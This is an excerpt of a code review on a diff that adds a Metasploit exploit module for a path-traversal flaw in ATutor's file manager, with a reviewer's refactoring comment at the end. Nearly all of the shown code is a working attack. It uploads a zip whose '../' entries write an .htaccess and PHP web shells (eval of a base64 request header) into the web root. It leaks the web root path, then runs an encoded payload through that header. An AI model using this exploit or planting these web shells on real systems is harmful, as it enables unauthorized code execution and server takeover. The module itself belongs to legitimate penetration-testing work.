modules/exploits/linux/http/atutor_filemanager_traversal.rb

```diff
@@ -0,0 +1,370 @@
+    return Exploit::CheckCode::Safe
+  end
+
+  def create_zip_file(check=false)
+    zip_file      = Rex::Zip::Archive.new
+    @header       = Rex::Text.rand_text_alpha_upper(4)
+    @payload_name = Rex::Text.rand_text_alpha_lower(4)
+    @archive_name = Rex::Text.rand_text_alpha_lower(3)
+    @test_string  = Rex::Text.rand_text_alpha_lower(8)
+    # we traverse back into the webroot mods/ directory (since it will be writable)
+    path = "../../../../../../../../../../../../..#{@webroot}mods/"
+
+    # we use this to give us the best chance of success. If a webserver has htaccess override enabled
+    # we will win. If not, we may still win because these file extensions are often registered as php
+    # with the webserver, thus allowing us remote code execution.
+    if check
+      zip_file.add_file("#{path}#{@payload_name}.txt", "#{@test_string}")
+    else
+      register_file_for_cleanup( ".htaccess", "#{@payload_name}.pht", "#{@payload_name}.php4", "#{@payload_name}.phtml")
+      zip_file.add_file("#{path}.htaccess", "AddType application/x-httpd-php .phtml .php4 .pht")
+      zip_file.add_file("#{path}#{@payload_name}.pht", "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
+      zip_file.add_file("#{path}#{@payload_name}.php4", "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
+      zip_file.add_file("#{path}#{@payload_name}.phtml", "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
+    end
+    zip_file.pack
+  end
+
+  def found
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "mods", "#{@payload_name}.txt"),
+    })
+    if res.code == 200 and res.body =~ /#{@test_string}/
+      return true
+    end
+    return false
+  end
+
+  def disclose_web_root
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "jscripts", "ATutor_js.php"),
+    })
+    @webroot = "/"
+    @webroot << $1 if res.body =~ /\<b\>\/(.*)jscripts\/ATutor_js\.php\<\/b\> /
+    if @webroot != "/"
+      return true
+    end
+    return false
+  end
+
+  def exec_code
+    # pwnage
+    res = nil
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "mods", "#{@payload_name}.pht"),
+      'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
+    }, timeout=0.1)
+    if res == nil
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, "mods", "#{@payload_name}.phtml"),
+        'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
+      }, timeout=0.1)
+    end
+    if res == nil
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, "mods", "#{@payload_name}.php4"),
+        'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
+      }, timeout=0.1)
+    end
```

Comment:
Perhaps this could be refactored to a single method where we pass on the extension each time.